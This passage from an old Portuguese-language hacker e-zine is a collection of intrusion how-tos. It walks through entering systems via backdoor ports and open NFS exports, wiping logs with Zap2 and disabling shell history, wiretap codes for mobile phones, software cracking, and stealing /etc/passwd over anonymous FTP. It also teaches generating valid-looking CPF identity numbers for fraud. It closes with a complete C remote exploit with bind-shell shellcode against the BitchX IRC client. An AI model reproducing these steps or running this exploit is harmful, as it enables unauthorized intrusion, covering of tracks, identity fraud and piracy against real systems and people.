conecte na porta atraves do telnet mesmo. 
Suponhamos q a porta 3000 esteja aberta,entao
voce faz o seguinte:
[localhost]# telnet www.<host>.com.br 3000
...
Caso a conexao seja extabelicida, digite um 
comando de linux seguido de ";" (2 pontos).
Exemplo:
[localhost]# telnet www.<alvo>.com.br 3000
pwd;
/root
: command not found

Obs: nao ligue para esse "command not found".
Pronto cara, voe estah dentro do sistema.Use
comandos de linux q vc deve conhecer..ou nao?
Caso nao conheca,pegue algum tutorial de lnx.
Agora se voce conhece, qualquer comando vaii
funcionar lah, porem, soh vai funcionar se o
comando for seguido de ";" (dois pontos).

-(3)- NFS 
Caso a backdoor do NFS esteja instalada no
servidor, eh possivel voce acessar todo o
sistema alvo com apenas o comando showmount
  
Acompanhe o exemplo:

- Na sua SHELL 

[localhost]# showmount -e hostalvo.com
Export list for hostalvo.com:
/ *
[localhost]# mount -t nfs hostalvo.com:/ /nfs
[localhost]# cd /nfs
[localhost]# ls -la 
...

-(4)- Couried
Caso a backdoor do couried esteja instalada,
basta voce conecta no host alvo por telnet
pela porta 530.

[localhost]# telnet <servidor> 530


1.3 APAGANDO OS LOGS DO SISTEMA
Apagar os logs nao eh um trabalho facil. Muitos
costumam entrar no sistema indevidamente e fazer
altos estragos e depois sai do sistema como se
nada tivesse acontecido. Porem, nao eh bom substima
o administrador, pois ele sabe muito bem como olhar 
os logs.

Entao voce se pergunta: como fazer para sair do
sistema sem ser pego futuramente? Eu respondo:
meu amigao, para voce nao ser pego futuramente
basta voce apagar os logs pois assim diminui
muito a chance de voce ser pego.

Suponhamos que voce usou o exploit do mount/umount
para obter root, ou outro metodo, entao, para voce
apagar os logs, leia abaixo:

Passo a Passo
##### # #####

-> Consiga o codigo do Zap2 (z2.c) no seguinte 
endereco: http://packetstorm.securify.com
Recorte o codigo (crtl + x) e depois cole
(crtl + v) ele no sistema. Para voce colar ele
no sistema, use o telnet do windows; caso esteja
no linux recorte e cole atraves do modo grafico.

-> Suponhamos que voce logou no sistema com o
login gotoxy, entao basta digitar:

bash# z2 gotoxy
Zap2 !
bash# w
bash# cd /var/log (ou /var/adm/ depende)
bash# vi maillog /* apague tudo lah dentro :) */

Entre no dir /var/log ou /var/adm e:
grep seu_host * | more
grep seu_ip * | more

Procure por rastros,caso encontre apague-os (atraves do /etc/syslog.conf).
Quando modificar o /etc/syslog.conf, nao se eskeca de reinicialo:

bash# killall -HUP /etc/syslog.conf

Agora entre no diretorio home do root e digite:
bash# ln -s /dev/null .bash_history
Com isso vossos comandos nao serao gravados no history

Assim o ajudarah muito. Portanto eh importante ressaltar
que voce deve tomar muito cuidado antes de sair e analisar
se ainda hah rastros seu no sistema atacado.


2. LINKS
http://packetstorm.securify.com
Esse site citado acima eh massa. Voce pode 
encontrar altos programas/exploits/textos/etc
lah. Eh soh mandar procurar o q vc quiser que
ele acha =]

www.hack.co.za
Outro site maneiro eh esse.Voce pode encontrar
altos programas lah, de acordo com a versao do
sistema operacional. Nessa homepage,estah tudo
separadinho,  especialmente para voce achar os 
progs com mais facilidades

www.securenet.com.br
Nesse site voce sabera as ultimas informacoes
do dia do mundo da informatica, alem de saber
varias vulnerabilidades q este site anuncia..
Alem de tudo, hah varios programas e exploits,
alem disso, hah um forum chamado BOS-BR e que 
alem disso tudo,ah mais um tanto de coisa lah. 
Confira =]


3. ULTIMAS PALAVRAS
Cuide-se fucador, lembre-se que NAO estou
ensinando isso para voce praticar,
ensino apenas para o seu aprendizado. Pois,
a cada dia temos, ou melhor, a cada segundo
nossa sabedoria deve crescer. E eh assim q
eh a vida de um fucador: a cada segundo,
aprendendo mais! :) bah! Um segundo eh muito
pouco... reformulando: E eh assim q eh a vida
de um fucadoor: a cada momento, aprendendo 
mais! :) ... Pronto, assim estah bem melhor..:)

                                                                Gotoxy
     					                                  gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [22]
==[ Tire suas duvidas ]==
==[ Por Gotoxy        ]==

.indiCe
1. iNTRODUCAO
2. DuViDaS 
   2.1 Como acessar os arkivos do lnx atraves do win? 
   2.2 O que eh SYN? e ACK ?
   2.3 O que eh GATEWAY e ROTEADOR?
   2.4 O que eh Host ?
   2.5 O que eh BBS ?
   2.6 O que eh moden ?
   2.7 O q eh DNS ?
   2.8 Tcp, Ip, NetBEUI... o que sao?
   2.9 E por fim: O que finalmente eh o LiNuX?
3. FIM  

################################################
             C4piTulo [1] - iNTRODUCAO 
################################################

.[ iNTRODUCAO ].
Muitos ouvem falar de gateway, host, moden, entre
outras coisas... porem nao sabem direito o que eh
e o que fazem. Entao, eu fiz uma especie de FAQ
para ajudar a vcs no significado das palavras
mais usadas na internet. 

################################################
             C4piTulo [2] - DuViDaS 
################################################

{2.1}- Como acessar os arkivos do linux atraves 
do windows?

voce vai precisar do programa LTOOLS que
voce pode encontrar ele no site abaixo:
www.it.fht-esslingen.de/~zimmerma/software/lread.html

Para voce rodar o LSTOOLS com perfeicao, eh 
necessario o JDK (Java Development Kit). vc
pode encontra-lo em: http://java.sun.com

------------------------//------------------------

{2.2}- O que eh SYN? e ACK ?

Resumidamente, ambos sao flags.

O SYN, eh um flag utilizado para iniciar
uma conexao entre o cliente e o servidor.
Eh o primeiro segmento enviado pelo protocolo
TCP.

No protocolo TCP/IP, o ACK indica que um pacote
foi recebido com exito.

------------------------//------------------------

{2.3}- O que eh GATEWAY e ROTEADOR?

Gateway: eh um computador ou equipamento
q serve para interligar suas ou mais 
redes q usem protocolos de comunicao
internos diferentes. Tb pode ser um 
computador q interliga uma rede local
a internet.

Roteador: computador, software ou equipamento
q serve para interligar duas ou mais redes,
q efetua automaticamente o direcionamento
dos pacotes de uma rede para outra.

------------------------//------------------------

{2.4}- O que eh Host ?

Host: o host eh o nome dado a qquer makina
conectada a internet.

------------------------//------------------------

{2.5}- O que eh BBS?

BBS eh tipo um clube q se disponabiliza arkivos de 
todos os tipos e onde ocorre conversas on-line.
Agora que a internet chegou, as bbs ficaram pouca
populares porem existe algumas por aih.

------------------------//------------------------

{2.6}- O que eh moden?

O modem eh um dispositivo q permite o envio e a 
recepcao de dados (arkivos,etc) atraves da linha 
telefonica. Eh com ele q acessamos a internet!(ohh)
Agora eu pergunto: o q seria de nos sem o moden?:)

------------------------//------------------------

{2.7}- O que eh DNS?
DNS eh um sistema responsavel pela conversao
de endereco no formato simbolico (por exemplo
www.zines-br.com) para o numerico, tb chamado
de endereco IP. Exemplo: 127.0.0.1 eh um end.
ip.

------------------------//------------------------

{2.8}- Tcp, Ip, ICMP e NetBEUI ... o que sao?

Tcp
O Tcp eh o protocolo mais importante. Eh com ele
que fazemos a transmissao e a troca de dados de
diferentes redes. O tcp pode ser utilizado por
qquer makina, pois nao pertecem a nenhuma
empresa. O tcp foi desenvolvido a partir de
fundos publicos.

Endereco IP
O endereco ip eh um numero q especifica uma
makina conectada a internet atraves do protocolo
TCP\IP. Ex: 200.254.226.1


ICMP
Significa Internet Control Message Protocol.
Parte integrante do protocolo da Internet (IP).
Sua funcao eh a de lidar com mensagens de erro
e de controle.

NetBEUI
Acronimo de Netbios Extended User Interface, o
protocolo de transporte da micro$oft. Com ele
eh possivel a interligacao de makinas de forma
rapidao e o melhor: de uma forma bem simples.
Esse protocolo eh muito utilizado em redes de
pekeno porte.

------------------------//------------------------

{2.9}- E por fim: O que finalmente eh o LiNuX?

muitos ouvem falar hj em dia no linux mas nao
fazem a menor ideia do que eh. porem, o que vou
falar sobre o linux nao eh nenhuma novidade para
que jah sabe o q eh o linux ou ate mesmo usam ele.

resumidamente, linux eh um sistema operacional.
eh bem diferente que o windows. eh mais voltado
para servidores, pois o linux eh um sistema
multi-usuario. o linux tb eh voltado tambem para
os programadores, pois nele (no linux) hah muitos
ferramentas para varias linguagens de programacao,
como c\c++, gtk, assembly, shell scritp, etc.
ele tb (o linux) eh muito utilizado por fucadores,
pois o lnx (linux) se destaca muito em relacao
ao hacking. existem varias distribuicoes do linux,
onde se destaca: o conectiva, o hed hat, o debian,
o slackware, entre outros. se voce esta migrando
do windows para o linux, saiba que nao serah muito
facil vc se acostumar com ele... portanto, eh bom
q vc pegue um tutorial antes e procure achar mais
informacoes sobre o linux.

bom, o basico que eu tinha que falar sobre o linux,
falei...agora eh com voce! :)


################################################
                C4piTulo [3] - FiM                  
################################################

na proxima edicao tem mais! :)
ah! se quiserem enviar alguma duvida, mande
para o nosso email (zine@zines-br.com).
ateh lah..:)
                                                                 Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.










SETOR [23]
==[ Pheaker (escutas telefonicas) ]==
==[ Por _0_of_Coll_               ]==

                             --[ MOTOROLA ]--

Para fazer escutas telefnicas:

                  Digite:   FCN 00**83786633 STO #11991#08#  
                                      11300#
                                   
                                  

Tem outro mdoto de ser fazer escutas telefnicas s que mais trabalho:

1- Tire a bateria e localize os pinos de contato, eles so 3, os 
dois das extremidades so os plos negativo e positivo do
telefone e o do meio  que o de "Test Mode".

2- Arrumar um pedacinho de papel aluminio, e colocar entre o pino 
central da bateria e do telefone, depois coloque a bateria.

3- Ao ligar o telefone N O aparecer o contador de sinal, iro 
aparecer nmeros piscando, isso quer dizer que o telefone
est pronto.

4- Ateno para sequncia de cdigos que tem que ser digitado:
#, a aparece a mensagem "U5' "08#, a da aparece um apostrofe
e  s escolher um cdigo abaixo.

110999

111020

111000

111030

111025

Depois de cada cdigo digitar # e pronto.

OBS.: Existem mais cdigos que so faceis de achar  s 
comear com 11 e chutar os 4 proximos nmeros.

  

------------------------------------------------------------------------ 

                             --[ NOKIA ]--

Colocar seu nome ou um texto qualquer em cima do n  do telefone que 
ser exibido ao ligar seu telefone celular,mas isso s acontecer se
no estiver utilizando nenhuma nota de abertura.

Digite: *3001#12345#  selecione a opo "NAM1", utilizando a tecla 
para cima selecione "ALPHA TAG" e escreva o texto desejado,a  s 
desligar e ligar o telefone.

OBS.: Quando digitar o cdigo *3001#12345# alm de aparecer a opo 
NAM1 aparecer outras opes,tome CUIDADO caso queira alterar outros 
menus como o SECURITY, que altera o cdigo de segurana do aparelho 
e o EMERGENCY, que altera os telefones de emergncia. 

Para programar um novo n  para o telefone

Digite: *#639# e digite o "novo" nmero do telefone.

Para verificar a data de fabricao e a verso do software instalado
em seu aparelho.

Digite: *#92772689#

Tecla 1 - Aparece a n  eletrnico do serial (serial number)

Tecla 2 - Aparece a data de Fabricao (made)

Tecla 3 - Aparece a data da programao (programming date)

Tecla 4 - Aparece o nmero de reparos feitos no aparelho (repaired)

Tecla 5 - Transfere os dados do usurio (Transfer user data?)

Tecla 6 -Contador geral (life time) 

Verifica a verso do "FIRMWARE" do telefone.

Digite: *#9999#

                                                                _0_of_Coll_
                                                                ofcoll@hotmail.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [24]
==[ Cracker    ]==
==[ Por Gotoxy ]==

Cracker

------------------------[ Crackeando  ]------------------------

Voce faz donwload de um arkivo e este arkivo avisa q
vc podera usar ele apenas no prazo de 30 dias e para 
vc continuar usando ele,eh necessario pagar um deter-
minado preco q na maioria das vezes,eh um absurdo !! 
Por esse motivo,venho eu a escrever este simples txt 
para ajudar aos usuarios que frequentam a internet a 
economizar o seu querido dinheiro, pois, devemos dar 
muito valor ao money! :)

Esses programas que cobram uma quantia de dinheiro para o 
usuario que pegou o programa continuar utilizando o mesmo,
sao conhecidos como [shareware].
Em outra palavras: shareware sao os programas que cobram
um determinado preco pelo o uso do mesmo.

A realidade eh que os codeadores* fazem esses tipos de 
programas (os chamados shareware) para sustentar a sua
familia.Ou ate mesmo,fazem apenas para divertir ou soh
ganhar dinheiro atoa. Sem sombra de duvida, eles estao
certos, porem, nao totalmente certo! Pois eles eskecem
dos nossos  amigos  crackeadores que tem como objetivo
deixar o programa totalmente free e assim byebye coder
pois o seu programa nao precisa ser pago mais para nos
continuarmos usando-o!!! :) 

Os crackeadores estao certos,porem ao mesmo tempo estao
errados. Certos  pelo motivo de estarem  economizando o 
dinheiro da populacao.Errados porque fazer esse tipo de
coisa, eh crime! Crackear pode ser divertido, porem, tb
pode ser muito perigoso!Porque?Porque caso o crackeador
seja descoberto,ele vai para a cadeia! E isso nao seria
nada bom.Mas nao se preocupe,se voce estiver utilizando
algum crack para cracker certo programa,definitivamente
afirmo: nao tem problema algum! voce nao vai ser preso,
mas nao eh bom abusar neh?! :) 


---------------------- [ pArTe PrAtiCa ] ----------------------

Saiba que para voce crackear um programa, nao tem problema algum.
Pois eh muito facil. Mais abaixo, eu mencionei o site onde voce 
procura pelo crack de um determinado programa que ele acha na 
hora para voce. Eh simplesmente muito rapido e o melhor: eh muito
facil!

------------[ o site ]------------
http://astalavista.box.sk
------------[ o site ]------------

- Entre no site citado acima...
- Digite no campo o nome do programa que voce desejar crackear...
- Clique em 'Search'...
- Espere terminar a busca...
- Logo, vai aparecer o resultado da busca. Entao voce clica no
link referente ao nome e a versao do programa a ser crackeado 
e depois que voce estiver dentro do site, vc procura pelo crack
e depois faca o download. O crack vem zipado. Em seguida, voce
deve descompactar o cracker no local onde se encontra o programa
a ser crackeado. Depois disso, eh soh voce clicar 2x no arquivo,
caso ele seja executavel ou, leia o texto q acompanha-o, caso 
ele exista. 
- Por fim, enjoy! O seu programa agora estah totalmente free !

------------------------[ Crackeando  ]------------------------

Bom pessoal, terminei. Espero ter ajudado mais na economia do
seu dinheiro, que sem duvida eh muito importante para voce!
Agora se voce desejar se tornar um crackeador tb, recomendo a
voce ter muito cuidado. E como inicio da "carreira", aprenda
Assmbly, q eh uma linguagem muito importante para um crackeador 
na hora de fazer suas malicias..:)

Sem mais.
                                                                 Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.











SETOR [25]
==[ Proxy, ftp e cpf ]==
==[ Por Phrozen_Byte ]==

Bom, eu e o meu irmo Dead_Byte estamos aqui, a convite da equipe de produo 
da Zines-br para escrever para o zine. Particularmente nesta edio escreverei 
sobre servidores proxy, senhas de FTP e o bsico sobre como gerar manualmente 
um cpf (cadastro nacional de pessoa fsica).

(1)- Servidores Proxy:

	Os servidores proxy so umas das armas mais utilizadas na internet para 
garantir seu anonimato e a sua privacidade.
Consiste basicamente em redirecionar sua requisio de uma pgina da web por 
um outro servidor que obviamente no  seu provedor.Essa operao troca seu 
ip,  isso que nos interessa. Isso basicamente mascara seu ip, alterando 
alguns dgitos do nmero original. 
Ex: 200.222.148.54 ficaria dependendo do proxy 200.222.153.20.

	Normalmente voc encontra proxies servers de portas como a 8080, 8081, 
3281, portas que voc essencialmente no precisa  intil. Considero importante 
configurarmos nossos navegadores com as portas 80 (http) , 21 (ftp) , 23 (telnet)
e 1080 (socks).
Isso evitar boa parte dos acessos no autorizados de lammers ou pessoas que no 
sabem analisar uma rede para te caar por um proxy.

No final desse texto publicarei uma lista de 14 proxies de Http(80). Devemos 
lembrar que voc leitor no deve fazer e nem preencher nenhum cadastro online 
para ter acesso a um proxy e nem recomendo usar o anonymizer, por motivos 
simples:

1- Se vc fizer um cadastro, seu ip vai ficar logado e caso vc faa alguma 
besteira ( o que sempre acontece...) pensando que ningum vai saber, vc vai 
se ferrar bonito, pois a empresa vender seus dados e chegaro at vc. Ateh 
mesmo porque se o acesso fosse annimo,para que vc precisaria preencher uma 
maldita ficha.

2- O Anonymizer, caso no saiba tem acordos com a Micro$oft, logo a galhuda 
do norte vai te pegar incondicionalmente,isso pq termo de servio no existe 
para acesso e experimental ( ningum paga para ter o proxy),alm do que mesmo 
que vc pagasse, muda-se s clausulas rapidamente.

3-Aquela tarja ridcula do Anonymizer polui o visual, incomoda, alm do mais o 
acesso por esse servidor eh lento.

	No me vai preencher cadatros de acesso de provedor, fichas para compras 
de produtos de lojas virtuais, achando que deu o golpe que eh um hacker, coisa 
e tal, isso porque a conexo eh segura e no eh feita pela 80 ( hahaha ) tomou 
bonito de novo. Alguns sites de criao de e-mail possuem a conexo segura pela 
81. Temos um exemplo clssico do Uol ( Underground of Lammers ), que utiliza a 
porta 5443,no me perguntem um proxy valhido, porque no digo, no distribuo nem 
desse nem dah 1080, somente com minha confiana libero os endereos.

      Contudo esse cadastro pode ser feito por um cyber caf da vida e de lah vc
faz a festa.
	Os proxies so recomendveis sim, contudo no podemos dizer que so 100% 
seguros, isso soh serve para te disfarar na internet,no para te esconder.
	Usando o Netscape Navigator 4.x ou a verso mais recente q eh a 6, eh soh 
clicar em Preferences-Advanced-Proxies-( A segunda opo,a conexo manual).Nisso 
vc coloca o endereo do proxy e a porta dele.O mecanismo eh parecido no Internet Explorer.
Recomendo usar um programa chamado DCHP que faz esse servio para vc.

                     ...{ ILUSTRACAO }...
 
Voce ------------------> Proxy Server ------------------> Site desejado
                     
                   
Bom em resumo bsico eh isso, agora a lista de 14 proxies de http(80):

server.arthouse.ie:80  
server.bbap-vasvar.sulinet.hu:80
server.mma.ru:80 
server.nada.co.jp:80 
server.provide.net:80 
server.ranet.de:80
server.scheiber.sulinet.hu:80
server.vedres-koll.sulinet.hu:80
server.wadot.com.au:80
server1.concordia.com.ar:80
server1.stanleyassoc.com:80 
server1.tnc.co.uk:80
server3.italcontainer.it:80
serveur1.arcadys.com:80

Obs: Essa lista originalmente eh imensa...

Vamos a segunda parte que :

(2)- Senhas em FTP's:

	Vejamos, esse texto eh curto somente para esclarecer como funciona 
o mecanismo de achar uma senha por ftp de um servidor.
	Primeiro vc tem que ter o WS_FTP Pro 6.5 ou maior ( recomendvel ), 
eu sei que o programa No eh freeware,mas isso no eh problema para a gente,
caso necessitem nos escrevam que enviaremos o serial number dele ou entao
leia o setor 24. Nisso vc vai colocar o ftp que quer hackear na guia endereo, 
o user serah anonymous e a senha serah o e-mail da vtima que bviamente tem 
que ser do mesmo provedor q vc entrar.
      Uma vez dentro pegue tudo dentro do diretrio bin e um arkivo chamado 
passwd,normalmente no diretrio etc,essa eh a senha criptografada da pessoa 
do e-mail que vc ps, feito isso vc tem que desincriptografar essa beldade
achada, caso no sabe mande para a gente que damos um jeito nisso.
	Lembre-se de uma coisinha, hackeie provedores de vrzea, aqueles de 
anncio de jornal, os provedores pequenos, porque normalmente a identificao
de seu ip estah na casa dos 4 minutos,no caso de provedores grandes essa taxa
pode chegar a 15 segundos para isso use um proxy de ftp...isso lhe dara mais de
um miuto adicional ateh eles te acharem nessa confuso.
	Pronto vc hackeou um e-mail. 


E finalizando...

(3)- Explicando o algortmo dos CPF's

	O nmero de CPF  formado por 11 dgitos, nesse esquema: xxxxxxxxx-xx. 
Por meio deste texto, pretendo explicar como funciona o algortmo de gerao 
desse nmero.
      Primeiramente,invente os nove primeiros dgitos,por exemplo: 42369851-xx.
Os x's servem para deixar o algortmo correto. Vou explicar nas seguintes linhas 
como obter o primeiro e o segundo dgito que tanto nos interessa.

Obs: O sinal * significa vezes (x)

(3.1)- DESVENDANDO O PRIMEIRO DIGITO:

Calcule:
         10*d1 + 9*d2 + 8*d3 + 7*d4 + 6*d5 + 5*d6 + 4*d7 + 3*d8 + 2*d9

OBS: dx  a posio do dgito. ex:d2 = Segundo dgito, no caso do nosso exemplo, 
o nmero quatro. 
	O resultado obtido serah 253.
	Agora, divida esse nmero por 11 (nmero total de dgitos no CPF). Voc ir 
obter o nmero 23 como resultado.
OBS: Se esta diviso der um nmero com casas decimais depois da vrgula, como por 
exemplo 23,2 ignore o que vem depois da vrgula, considere apenas o inteiro.
	Multiplique dessa vez 23 * 11 (numero da diviso * numero total de digitos 
do CPF). Agora, Subtraia do nmero 253, vindo da primeira conta que voc teve de 
fazer, o nmero obtido com a multiplicao 23 * 11. Se o resto for igual a 0 ou 
igual a 1, o primeiro dgito depois do hfen no CPF ser igual a 0, obteremos 
assim o seguinte: 542369851-0x.
	Se o resultado da subtrao for diferente de 0 e 1, para obter o primeiro x 
calcule: 11 menos o resto da subtrao. 

                                                               

(3.2)- DESVENDANDO O SEGUNDO DIGITO:

Falta o segundo x, vamos desvend-lo!

Calcule o seguinte: 
        11*d1 + 10*d2 + 9*d3 + 8*d4 + 7*d5 + 6*d6 + 5*d7 + 4*d8 + 3*d9 + 2* 
(primeiro dgito obtido anteriormente)

OBS: "dx"  a posio do dgito e "primeiro dgito obtido anteriormente"  o 
primeiro x depois do hfen, no nosso caso, o nmero 0. 

Voce obtera o resultado 296.Divida isso por 11(nmero de dgitos do CPF). 
Obter 26,909.Use s a parte inteira desse nmero e multiplique por 11(26*11)
O resultado ser 286. Subtraia 296(vindo da primeira conta pra esse dgito) 
por 286(conta que acabamos de fazer).Obteremos o resultado 10. Vale a mesma 
regra que usamos no primeiro x. 
	Se o resto for 0 ou 1, o x  igual a 0, se o resto da subtrao for 
diferente de 0 ou 1, subtraia 11 pelo nmero. 
Exemplo: Se a subtrao der 5, faa 11 - 5 = 6. o x vai ser igual a 6. 
Mas voltando ao nosso nmero, o x deu igual a 10. Ou seja, o x  igual a 1.
Assim sendo, o CPF V LIDO obtido por ns foi: 542369851-01.

                                                               

(4)- CONCLUSAO:

Bom essa  a conta feita pela Receita para gerar o CPF, o que demonstrei  
apenas o bsico sobre cpf,no caso do cgc eh parecido caso necessrio eu ensino 
depois caso vc's queiram. Existe 1.000.000.000 de combinaes possveis contudo 
existem no mnimo 100.000.000 de cpf vlidos no Brasil,ou seja 1 em cada 10 cpf's 
gerados existem um cadastro fixo. 
Curiosidade: Se fssemos armazenar todos os cpf's vlidos brasileiros precisaramos 
no mnimo de 9 GB de HD...
Caso algum tenha um dicionrio para senhas de 6 algartimos por favor me enviem q 
estou sem saco de fazer.

Isso pode ser til de duas formas:
1  Se voc precisar de um nmero de CPF, faa-o! 
2  Se voc tiver conhecimentos em alguma linguagem de programao,faa um programa 
que gere esses nmeros !

Somente vou ensinar o programa que verifica a validade deste cpf, verifica se a 
conta que voce fez estah certa.

Verifica validade de CGC e CPF
------------------------------- corte akih -------------------------------
unit CPFeCGC;

interface
function cpf(num: string): boolean;
function cgc(num: string): boolean;

implementation

uses SysUtils;

function cpf(num: string): boolean;
var
n1,n2,n3,n4,n5,n6,n7,n8,n9: integer;
d1,d2: integer;
digitado, calculado: string;
begin
n1:=StrToInt(num[1]);
n2:=StrToInt(num[2]);
n3:=StrToInt(num[3]);
n4:=StrToInt(num[4]);
n5:=StrToInt(num[5]);
n6:=StrToInt(num[6]);
n7:=StrToInt(num[7]);
n8:=StrToInt(num[8]);
n9:=StrToInt(num[9]);
d1:=n9*2+n8*3+n7*4+n6*5+n5*6+n4*7+n3*8+n2*9+n1*10;
d1:=11-(d1 mod 11);
if d1>=10 then d1:=0;
d2:=d1*2+n9*3+n8*4+n7*5+n6*6+n5*7+n4*8+n3*9+n2*10+n1*11;
d2:=11-(d2 mod 11);
if d2>=10 then d2:=0;
calculado:=inttostr(d1)+inttostr(d2);
digitado:=num[10]+num[11];
if calculado=digitado then
cpf:=true
else
cpf:=false;
end;

function cgc(num: string): boolean;
var
n1,n2,n3,n4,n5,n6,n7,n8,n9,n10,n11,n12: integer;
d1,d2: integer;
digitado, calculado: string;
begin
n1:=StrToInt(num[1]);
n2:=StrToInt(num[2]);
n3:=StrToInt(num[3]);
n4:=StrToInt(num[4]);
n5:=StrToInt(num[5]);
n6:=StrToInt(num[6]);
n7:=StrToInt(num[7]);
n8:=StrToInt(num[8]);
n9:=StrToInt(num[9]);
n10:=StrToInt(num[10]);
n11:=StrToInt(num[11]);
n12:=StrToInt(num[12]);
d1:=n12*2+n11*3+n10*4+n9*5+n8*6+n7*7+n6*8+n5*9+n4*2+n3*3+n2*4+n1*5;
d1:=11-(d1 mod 11);
if d1>=10 then d1:=0;
d2:=d1*2+n12*3+n11*4+n10*5+n9*6+n8*7+n7*8+n6*9+n5*2+n4*3+n3*4+n2*5+n1*6;
d2:=11-(d2 mod 11);
if d2>=10 then d2:=0;
calculado:=inttostr(d1)+inttostr(d2);
digitado:=num[13]+num[14];
if calculado=digitado then
cgc:=true
else
cgc:=false;
end;

end.
------------------------------- corte akih -------------------------------
Obs: No me pergunte que linguagem eh essa que eu me recuso a responder...

Bem essa foi a minha contribuio para essa edio da Zines-Br, espero que 
tenham gostado, lembrando que usa-se como base a plataforma Windows. Agradeo 
a todos que possibilitaram ao nvel de informao que possuo hoje. Na prxima 
edio explicarei como gera-se manualmente os cartes Visa e Dinners ( isso 
porque o Dinners soh utiliza quem tem grana alta, timo para compras, ele 
normalmente tem sempre crdito ).

Obrigado.
Texto escrito e desenvolvido by Phrozen_Byte 

                                                              Phrozen_Byte
     					                                phrozen@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [26]
==[ Vulnerabilidade no BitchX ]==
==[ Por Gotoxy                ]==

Voces conhecem o BitchX? Caso use Linux,
provavelmente conhece ele muito bem, estou
errado? Acho que naum..:) 

Recomendo aos bitchxIRQueiros a nao utilizar
BitchX 74p4, pois ele estah com uma tremenda
vulnerabilidade no seu codigo. Sendo assim, 
voce estarah correndo um grande risco! Portanto,
update seu BX para uma versao mais nova!

Abaixo segue o exploit feito pelo plaguez/ndubee
que eh capaz de executar comandos no computador
alvo quando se recebe um dcc chat:

----------------------- CUT HERE -----------------------
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/in.h>

#define PORT 6667
#define BUFSIZE 2068

char *ops =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
"\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
"\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
"\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
"\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
"\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89"
"\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69"
"\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff";

void main(int argc, char **argv)
{
  char *p, *q, i = 0;
  int *addr, len = BUFSIZE + (char) 2*sizeof(char *);
  int base   = 0xBFFFF5C6;
  int offset = 0;
  
  if(argc < 3)
    printf("Syntax: %s <nick>@<server> <myip>\n", *argv), exit(0);
 
  if(argc > 3)
    offset = atoi(argv[3]);
 
  if(!strchr(argv[1], '@'))
    printf("Syntax: %s <nick>@<server> <myip>\n", *argv), exit(0);

  q = p = (char *) malloc(1 + len);
  memset(p, 0x90, 1 + len);
  
  for(q = (p + BUFSIZE - strlen(ops)); *ops; *q++ = *ops++) 
    ;
  
  for(addr = (int *) q; i < 2*sizeof(char *); i += 4)
    *(addr++) = base - offset;  
  
  *(q + i++) = '\n';
  *(q + i) = '\0';
  
  printf("Attacking.. %d using %X[%d]\n", strlen(p), base - offset, offset);
  fflush(stdout);

  attack(argv[1],argv[2], p);
  free(p);
}

void attack(char *stuff, char *ip, char *b)
{
  int s, l, a, i = sizeof(struct sockaddr_in), pp;
  struct sockaddr_in sin;
  char buf[512], *ser;
  unsigned long int ll;
  
  ser = strchr(stuff, '@');
  *ser++ = '\0';

  sin.sin_family = AF_INET;
  sin.sin_port   = htons(PORT);
  sin.sin_addr.s_addr = inet_addr(ser);

  ll		 = htonl(inet_addr(ip));
  srand(time(NULL));
  pp = rand();

  
  s = socket(AF_INET, SOCK_STREAM, 0);
  if(connect(s, &sin, sizeof(sin)) == -1)
    printf("Can't connect to ircserver\n"), exit(0);
  
  strcpy(buf, "USER A A A A\n");
  write(s, buf, strlen(buf));
  strcpy(buf, "NICK _bit_\n");
  write(s, buf, strlen(buf));
  sprintf(buf, "PRIVMSG %s :%cDCC CHAT chat %u %d%c\n", stuff, '\001', ll,
  		pp, '\001');
  write(s, buf, strlen(buf));

  sin.sin_port = htons(pp);
  sin.sin_addr.s_addr = INADDR_ANY;
  
  l = socket(AF_INET, SOCK_STREAM, 0);
  bind(l, &sin, sizeof(sin));
  listen(l, 5);
  
  printf("Wating for connection..."); fflush(stdout);

  a = accept(l, &sin, &i);
  
  write(a, b, strlen(b));
  sleep(1);
  
  close(s);
  close(l);
  close(a);
  
  printf("now telnet to %s's ip port 10752\n", stuff);
}
----------------------- CUT HERE -----------------------

Com o exploit acima voce poderah ter acesso ao sistema 
alvo atraves da porta 10752.

Cuide-se amigos ircqueiros, o perigo estah proximo! bah
Lembre-se fucador: voce nao se tornara um hacker fzd atos
como atrapalhar pessoas inocentes que se divertem no irc.
Apenas, "jogue" com as pessoas que estejam no "jogo"...:)
Sem mais.

                                                                Gotoxy
     					                                  gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [27]
==[ ANARCHY        ]==
==[ Por kbytes     ]==

	Vou colocar um texto falando o q eh anarquia. Mas pq escrever isto?
Pq vejo em muitos zines o seguinte no conteudo de "Anarchy": "Como faze uma bomba
de num sei o q...". Somente esses tipos de coisa que coloca na cabeca do povo q
anarquizar eh solta bomba... faze terrorismo e tal... o principal objetivo deste
texto abaixo eh mostrar totalmente o contrario do q vc pensa. Leia atentamente
o q est escrito abaixo q entender o q eh.


POR QUE ANARQUIA?

 Porque  todos  nasceram  para  ser  livre,  mas o princpio da autoridade
